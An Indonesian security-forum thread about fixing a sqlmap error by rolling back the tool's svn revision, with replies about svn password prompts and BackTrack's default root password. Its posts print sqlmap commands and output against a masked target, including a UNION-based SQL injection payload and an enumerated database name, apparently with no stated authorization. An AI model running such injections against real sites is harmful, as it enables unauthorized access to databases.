[ Share ] Fix Error SQLMap
#1
Waktu ane jalanin SQLMap muncul yang kaya ginian..

Code:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs

sqlmap/1.0-dev (r4380) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:26:22

[14:26:22] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
[14:26:22] [INFO] resuming injection data from session file
[14:26:22] [INFO] resuming back-end DBMS 'mysql 4' from session file
[14:26:22] [INFO] testing connection to the target url
[14:26:23] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
---

[14:26:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
[14:26:23] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[14:26:24] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[14:26:24] [WARNING] the SQL query provided does not return any output
available databases [1]:
[*]

[14:26:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'

[*] shutting down at 14:26:24

yang bagian [*] harusnya nampilin database dari web yang di-enumerate. rupanya database SQLMap nya eror. ane tanya sama si bebek jawabannya " weeekk " trus beralih ke om gugle hasilnya seperti ini..

Code:
root@bt:/pentest/database/sqlmap# svn update -r 4319
D    _sqlmap.py
U    xml/payloads.xml
U    plugins/dbms/sybase/enumeration.py
U    plugins/generic/enumeration.py
U    sqlmap.conf
U    sqlmap.py
U    doc/FAQ.pdf
U    doc/README.html
U    doc/README.pdf
U    doc/THANKS
U    doc/README.sgml
U    lib/takeover/web.py
U    lib/takeover/metasploit.py
U    lib/utils/hash.py
U    lib/controller/checks.py
U    lib/controller/controller.py
U    lib/core/common.py
U    lib/core/threads.py
U    lib/core/agent.py
U    lib/core/settings.py
U    lib/core/dump.py
U    lib/core/defaults.py
U    lib/core/option.py
U    lib/core/optiondict.py
U    lib/request/connect.py
U    lib/request/comparison.py
U    lib/request/basic.py
U    lib/techniques/blind/inference.py
U    lib/techniques/union/use.py
U    lib/techniques/union/test.py
U    lib/techniques/error/use.py
U    lib/parse/cmdline.py
D    tamper/unmagicquotes.py
Updated to revision 4319.

SQLMap ane bisa lagi deh, database web nya keliatan namanya
[*]ituaja_ribet

Code:
root@fsckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs

sqlmap/1.0-dev (r4319) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:26:53

[14:26:53] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
[14:26:53] [INFO] resuming injection data from session file
[14:26:53] [INFO] resuming back-end DBMS 'mysql 4' from session file
[14:26:53] [INFO] testing connection to the target url
[14:26:54] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
---

[14:26:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
[14:26:54] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[14:26:54] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[14:26:54] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
[14:26:56] [INFO] fetching number of databases
[14:26:56] [ERROR] unable to retrieve the number of databases
[14:26:56] [INFO] falling back to current database
[14:26:56] [INFO] fetching current database
[14:26:56] [INFO] read from file '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session': pwnetwork
available databases [1]:
[*] ituaja_ribet

[14:26:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'

[*] shutting down at 14:26:56

root@bt:/pentest/database/sqlmap#

siip dah..
tetap sehat..tetap semangat..tetap jalan-jalan wisata BackTrack di forum.indonesianbacktrack.or.id
pokoke maknyuuusss...:apn:

#2
Nice Info Confused

#3
rep +1 from ane kait0 ...

#4
(10-21-2011, 02:00 PM)cassaprodigy Wrote: rep +1 from ane kait0 ...

Makasi om Angel

#5
(10-21-2011, 07:46 AM)k41t0 Wrote: Waktu ane jalanin SQLMap muncul yang kaya ginian..

Code:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs

sqlmap/1.0-dev (r4380) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:26:22

[14:26:22] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
[14:26:22] [INFO] resuming injection data from session file
[14:26:22] [INFO] resuming back-end DBMS 'mysql 4' from session file
[14:26:22] [INFO] testing connection to the target url
[14:26:23] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
---

[14:26:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
[14:26:23] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[14:26:24] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[14:26:24] [WARNING] the SQL query provided does not return any output
available databases [1]:
[*]

[14:26:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'

[*] shutting down at 14:26:24

yang bagian [*] harusnya nampilin database dari web yang di-enumerate. rupanya database SQLMap nya eror. ane tanya sama si bebek jawabannya " weeekk " trus beralih ke om gugle hasilnya seperti ini..

Code:
root@bt:/pentest/database/sqlmap# svn update -r 4319
D    _sqlmap.py
U    xml/payloads.xml
U    plugins/dbms/sybase/enumeration.py
U    plugins/generic/enumeration.py
U    sqlmap.conf
U    sqlmap.py
U    doc/FAQ.pdf
U    doc/README.html
U    doc/README.pdf
U    doc/THANKS
U    doc/README.sgml
U    lib/takeover/web.py
U    lib/takeover/metasploit.py
U    lib/utils/hash.py
U    lib/controller/checks.py
U    lib/controller/controller.py
U    lib/core/common.py
U    lib/core/threads.py
U    lib/core/agent.py
U    lib/core/settings.py
U    lib/core/dump.py
U    lib/core/defaults.py
U    lib/core/option.py
U    lib/core/optiondict.py
U    lib/request/connect.py
U    lib/request/comparison.py
U    lib/request/basic.py
U    lib/techniques/blind/inference.py
U    lib/techniques/union/use.py
U    lib/techniques/union/test.py
U    lib/techniques/error/use.py
U    lib/parse/cmdline.py
D    tamper/unmagicquotes.py
Updated to revision 4319.

SQLMap ane bisa lagi deh, database web nya keliatan namanya
[*]ituaja_ribet

Code:
root@fsckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs

sqlmap/1.0-dev (r4319) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:26:53

[14:26:53] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
[14:26:53] [INFO] resuming injection data from session file
[14:26:53] [INFO] resuming back-end DBMS 'mysql 4' from session file
[14:26:53] [INFO] testing connection to the target url
[14:26:54] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: search
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
---

[14:26:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL 4
[14:26:54] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[14:26:54] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
[14:26:54] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
[14:26:56] [INFO] fetching number of databases
[14:26:56] [ERROR] unable to retrieve the number of databases
[14:26:56] [INFO] falling back to current database
[14:26:56] [INFO] fetching current database
[14:26:56] [INFO] read from file '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session': pwnetwork
available databases [1]:
[*] ituaja_ribet

[14:26:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'

[*] shutting down at 14:26:56

root@bt:/pentest/database/sqlmap#

siip dah..
tetap sehat..tetap semangat..tetap jalan-jalan wisata BackTrack di forum.indonesianbacktrack.or.id
pokoke maknyuuusss...:apn:
om kok minta password gini??
Code:
root@bt:~# cd /pentest/database/sqlmap/
root@bt:/pentest/database/sqlmap# svn update -r 4319
U    txt/common-columns.txt
U    txt/wordlist.txt
U    txt/user-agents.txt
U    txt/common-tables.txt
U    xml/banner/mssql.xml
U    xml/errors.xml
U    xml/payloads.xml
U    xml/queries.xml
U    plugins/dbms/access/connector.py
U    plugins/dbms/access/__init__.py
U    plugins/dbms/access/takeover.py
U    plugins/dbms/access/filesystem.py
U    plugins/dbms/access/enumeration.py
U    plugins/dbms/access/syntax.py
U    plugins/dbms/access/fingerprint.py
U    plugins/dbms/sqlite/connector.py
U    plugins/dbms/sqlite/__init__.py
U    plugins/dbms/sqlite/takeover.py
U    plugins/dbms/sqlite/filesystem.py
U    plugins/dbms/sqlite/enumeration.py
U    plugins/dbms/sqlite/syntax.py
U    plugins/dbms/sqlite/fingerprint.py
U    plugins/dbms/postgresql/connector.py
U    plugins/dbms/postgresql/__init__.py
U    plugins/dbms/postgresql/takeover.py
U    plugins/dbms/postgresql/filesystem.py
U    plugins/dbms/postgresql/enumeration.py
U    plugins/dbms/postgresql/syntax.py
U    plugins/dbms/postgresql/fingerprint.py
U    plugins/dbms/mysql/connector.py
U    plugins/dbms/mysql/__init__.py
U    plugins/dbms/mysql/takeover.py
U    plugins/dbms/mysql/filesystem.py
U    plugins/dbms/mysql/enumeration.py
U    plugins/dbms/mysql/syntax.py
U    plugins/dbms/mysql/fingerprint.py
U    plugins/dbms/oracle/connector.py
U    plugins/dbms/oracle/__init__.py
U    plugins/dbms/oracle/takeover.py
U    plugins/dbms/oracle/filesystem.py
U    plugins/dbms/oracle/enumeration.py
U    plugins/dbms/oracle/syntax.py
U    plugins/dbms/oracle/fingerprint.py
U    plugins/dbms/__init__.py
U    plugins/dbms/firebird/connector.py
U    plugins/dbms/firebird/__init__.py
U    plugins/dbms/firebird/takeover.py
U    plugins/dbms/firebird/filesystem.py
U    plugins/dbms/firebird/enumeration.py
U    plugins/dbms/firebird/syntax.py
U    plugins/dbms/firebird/fingerprint.py
U    plugins/dbms/mssqlserver/connector.py
U    plugins/dbms/mssqlserver/__init__.py
U    plugins/dbms/mssqlserver/takeover.py
U    plugins/dbms/mssqlserver/filesystem.py
U    plugins/dbms/mssqlserver/enumeration.py
U    plugins/dbms/mssqlserver/syntax.py
U    plugins/dbms/mssqlserver/fingerprint.py
U    plugins/dbms/sybase/connector.py
U    plugins/dbms/sybase/__init__.py
U    plugins/dbms/sybase/takeover.py
U    plugins/dbms/sybase/filesystem.py
U    plugins/dbms/sybase/enumeration.py
U    plugins/dbms/sybase/syntax.py
U    plugins/dbms/sybase/fingerprint.py
A    plugins/dbms/db2
A    plugins/dbms/db2/connector.py
A    plugins/dbms/db2/__init__.py
A    plugins/dbms/db2/takeover.py
A    plugins/dbms/db2/filesystem.py
A    plugins/dbms/db2/enumeration.py
A    plugins/dbms/db2/syntax.py
A    plugins/dbms/db2/fingerprint.py
U    plugins/dbms/maxdb/connector.py
U    plugins/dbms/maxdb/__init__.py
U    plugins/dbms/maxdb/takeover.py
U    plugins/dbms/maxdb/filesystem.py
U    plugins/dbms/maxdb/enumeration.py
U    plugins/dbms/maxdb/syntax.py
U    plugins/dbms/maxdb/fingerprint.py
U    plugins/__init__.py
U    plugins/generic/connector.py
U    plugins/generic/misc.py
U    plugins/generic/__init__.py
U    plugins/generic/takeover.py
U    plugins/generic/filesystem.py
U    plugins/generic/enumeration.py
U    plugins/generic/syntax.py
U    plugins/generic/fingerprint.py
U    sqlmap.conf
D    extra/xmlobject
UU   extra/socks/__init__.py
UU   extra/socks/socks.py
U    extra/__init__.py
A    extra/beautifulsoup
A    extra/beautifulsoup/__init__.py
A    extra/beautifulsoup/beautifulsoup.py
U    extra/safe2bin/safe2bin.py
U    extra/safe2bin/__init__.py
U    extra/cloak/cloak.py
U    extra/cloak/__init__.py
U    extra/dbgtool/dbgtool.py
U    extra/dbgtool/__init__.py
U    extra/shutils/blanks.sh
U    extra/shutils/duplicates.py
U    extra/shutils/id.sh
U    extra/sqlharvest/sqlharvest.py
U    extra/sqlharvest/__init__.py
U    extra/mssqlsig/update.py
U    extra/odict/odict.py
U    extra/msfauxmod/sqlmap.rb
U    extra/udfhack/linux/32/lib_postgresqludf_sys/install.sh
U    extra/udfhack/linux/32/lib_postgresqludf_sys/Makefile
U    extra/udfhack/linux/64/lib_postgresqludf_sys/install.sh
U    extra/udfhack/linux/64/lib_postgresqludf_sys/Makefile
U    extra/udfhack/windows/64/lib_postgresqludf_sys/README.txt
U   extra/oset/__init__.py
U   extra/oset/pyoset.py
U   extra/oset/_abc.py
U    sqlmap.py
A    doc/FAQ.pdf
U    doc/README.html
U    doc/AUTHORS
U    doc/README.pdf
U    doc/ChangeLog
U    doc/FAQ.sgml
U    doc/THANKS
A    doc/FAQ.html
U    doc/README.sgml
U    lib/takeover/registry.py
U    lib/takeover/abstraction.py
U    lib/takeover/web.py
U    lib/takeover/udf.py
U    lib/takeover/__init__.py
U    lib/takeover/metasploit.py
U    lib/takeover/xp_cmdshell.py
U    lib/takeover/icmpsh.py
U    lib/utils/getch.py
[b]Authentication realm: <https://svn.sqlmap.org:443> Authentication required
Password for 'root':
Authentication realm: <https://svn.sqlmap.org:443> Authentication required
Username: root
Password for 'root':
Authentication realm: <https://svn.sqlmap.org:443> Authentication required
Username: root
Password for 'root':
svn: OPTIONS of 'https://svn.sqlmap.org/sqlmap': authorization failed: Could not authenticate to server: rejected Digest challenge (https://svn.sqlmap.org)[/b]
helep

dia mnta password root,ane masukin toor,,salah yah?

#6
wah masa sih .. ane toor kok.. itu kalau belum di rubah aama om Tongue

#7
Quote:om kok minta password gini??
Code:
root@bt:~# cd /pentest/database/sqlmap/
root@bt:/pentest/database/sqlmap# svn update -r 4319
U    txt/common-columns.txt
U    txt/wordlist.txt
U    txt/user-agents.txt
U    txt/common-tables.txt
U    xml/banner/mssql.xml
U    xml/errors.xml
U    xml/payloads.xml
U    xml/queries.xml
U    plugins/dbms/access/connector.py
U    plugins/dbms/access/__init__.py
U    plugins/dbms/access/takeover.py
U    plugins/dbms/access/filesystem.py
U    plugins/dbms/access/enumeration.py
U    plugins/dbms/access/syntax.py
U    plugins/dbms/access/fingerprint.py
U    plugins/dbms/sqlite/connector.py
U    plugins/dbms/sqlite/__init__.py
U    plugins/dbms/sqlite/takeover.py
U    plugins/dbms/sqlite/filesystem.py
U    plugins/dbms/sqlite/enumeration.py
U    plugins/dbms/sqlite/syntax.py
U    plugins/dbms/sqlite/fingerprint.py
U    plugins/dbms/postgresql/connector.py
U    plugins/dbms/postgresql/__init__.py
U    plugins/dbms/postgresql/takeover.py
U    plugins/dbms/postgresql/filesystem.py
U    plugins/dbms/postgresql/enumeration.py
U    plugins/dbms/postgresql/syntax.py
U    plugins/dbms/postgresql/fingerprint.py
U    plugins/dbms/mysql/connector.py
U    plugins/dbms/mysql/__init__.py
U    plugins/dbms/mysql/takeover.py
U    plugins/dbms/mysql/filesystem.py
U    plugins/dbms/mysql/enumeration.py
U    plugins/dbms/mysql/syntax.py
U    plugins/dbms/mysql/fingerprint.py
U    plugins/dbms/oracle/connector.py
U    plugins/dbms/oracle/__init__.py
U    plugins/dbms/oracle/takeover.py
U    plugins/dbms/oracle/filesystem.py
U    plugins/dbms/oracle/enumeration.py
U    plugins/dbms/oracle/syntax.py
U    plugins/dbms/oracle/fingerprint.py
U    plugins/dbms/__init__.py
U    plugins/dbms/firebird/connector.py
U    plugins/dbms/firebird/__init__.py
U    plugins/dbms/firebird/takeover.py
U    plugins/dbms/firebird/filesystem.py
U    plugins/dbms/firebird/enumeration.py
U    plugins/dbms/firebird/syntax.py
U    plugins/dbms/firebird/fingerprint.py
U    plugins/dbms/mssqlserver/connector.py
U    plugins/dbms/mssqlserver/__init__.py
U    plugins/dbms/mssqlserver/takeover.py
U    plugins/dbms/mssqlserver/filesystem.py
U    plugins/dbms/mssqlserver/enumeration.py
U    plugins/dbms/mssqlserver/syntax.py
U    plugins/dbms/mssqlserver/fingerprint.py
U    plugins/dbms/sybase/connector.py
U    plugins/dbms/sybase/__init__.py
U    plugins/dbms/sybase/takeover.py
U    plugins/dbms/sybase/filesystem.py
U    plugins/dbms/sybase/enumeration.py
U    plugins/dbms/sybase/syntax.py
U    plugins/dbms/sybase/fingerprint.py
A    plugins/dbms/db2
A    plugins/dbms/db2/connector.py
A    plugins/dbms/db2/__init__.py
A    plugins/dbms/db2/takeover.py
A    plugins/dbms/db2/filesystem.py
A    plugins/dbms/db2/enumeration.py
A    plugins/dbms/db2/syntax.py
A    plugins/dbms/db2/fingerprint.py
U    plugins/dbms/maxdb/connector.py
U    plugins/dbms/maxdb/__init__.py
U    plugins/dbms/maxdb/takeover.py
U    plugins/dbms/maxdb/filesystem.py
U    plugins/dbms/maxdb/enumeration.py
U    plugins/dbms/maxdb/syntax.py
U    plugins/dbms/maxdb/fingerprint.py
U    plugins/__init__.py
U    plugins/generic/connector.py
U    plugins/generic/misc.py
U    plugins/generic/__init__.py
U    plugins/generic/takeover.py
U    plugins/generic/filesystem.py
U    plugins/generic/enumeration.py
U    plugins/generic/syntax.py
U    plugins/generic/fingerprint.py
U    sqlmap.conf
D    extra/xmlobject
UU   extra/socks/__init__.py
UU   extra/socks/socks.py
U    extra/__init__.py
A    extra/beautifulsoup
A    extra/beautifulsoup/__init__.py
A    extra/beautifulsoup/beautifulsoup.py
U    extra/safe2bin/safe2bin.py
U    extra/safe2bin/__init__.py
U    extra/cloak/cloak.py
U    extra/cloak/__init__.py
U    extra/dbgtool/dbgtool.py
U    extra/dbgtool/__init__.py
U    extra/shutils/blanks.sh
U    extra/shutils/duplicates.py
U    extra/shutils/id.sh
U    extra/sqlharvest/sqlharvest.py
U    extra/sqlharvest/__init__.py
U    extra/mssqlsig/update.py
U    extra/odict/odict.py
U    extra/msfauxmod/sqlmap.rb
U    extra/udfhack/linux/32/lib_postgresqludf_sys/install.sh
U    extra/udfhack/linux/32/lib_postgresqludf_sys/Makefile
U    extra/udfhack/linux/64/lib_postgresqludf_sys/install.sh
U    extra/udfhack/linux/64/lib_postgresqludf_sys/Makefile
U    extra/udfhack/windows/64/lib_postgresqludf_sys/README.txt
U   extra/oset/__init__.py
U   extra/oset/pyoset.py
U   extra/oset/_abc.py
U    sqlmap.py
A    doc/FAQ.pdf
U    doc/README.html
U    doc/AUTHORS
U    doc/README.pdf
U    doc/ChangeLog
U    doc/FAQ.sgml
U    doc/THANKS
A    doc/FAQ.html
U    doc/README.sgml
U    lib/takeover/registry.py
U    lib/takeover/abstraction.py
U    lib/takeover/web.py
U    lib/takeover/udf.py
U    lib/takeover/__init__.py
U    lib/takeover/metasploit.py
U    lib/takeover/xp_cmdshell.py
U    lib/takeover/icmpsh.py
U    lib/utils/getch.py
[b]Authentication realm: <https://svn.sqlmap.org:443> Authentication required
Password for 'root':
Authentication realm: <https://svn.sqlmap.org:443> Authentication required
Username: root
Password for 'root':
Authentication realm: <https://svn.sqlmap.org:443> Authentication required
Username: root
Password for 'root':
svn: OPTIONS of 'https://svn.sqlmap.org/sqlmap': authorization failed: Could not authenticate to server: rejected Digest challenge (https://svn.sqlmap.org)[/b]
helep

dia mnta password root,ane masukin toor,,salah yah?


Betul kata om cassaprodigy...


#8
[Image: 2wbsrxs.png]

nih om ane masalahnya sama ama om junior.riau18 .
password belum ane ganti tetep "toor" tapi keluarnya kaya gini TTT.TTT

#9
coba ganti dulu password defaultnya.
trs coba lagi Smile

Saya gaperlu masukin password apa2 Smile

Spoiler! :
[Image: b4x1ub.png]
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#10
Quote:nih om ane masalahnya sama ama om junior.riau18 .
password belum ane ganti tetep "toor" tapi keluarnya kaya gini TTT.TTT

Kayanya om mke user tambahan bukan root..






Users browsing this thread: 2 Guest(s)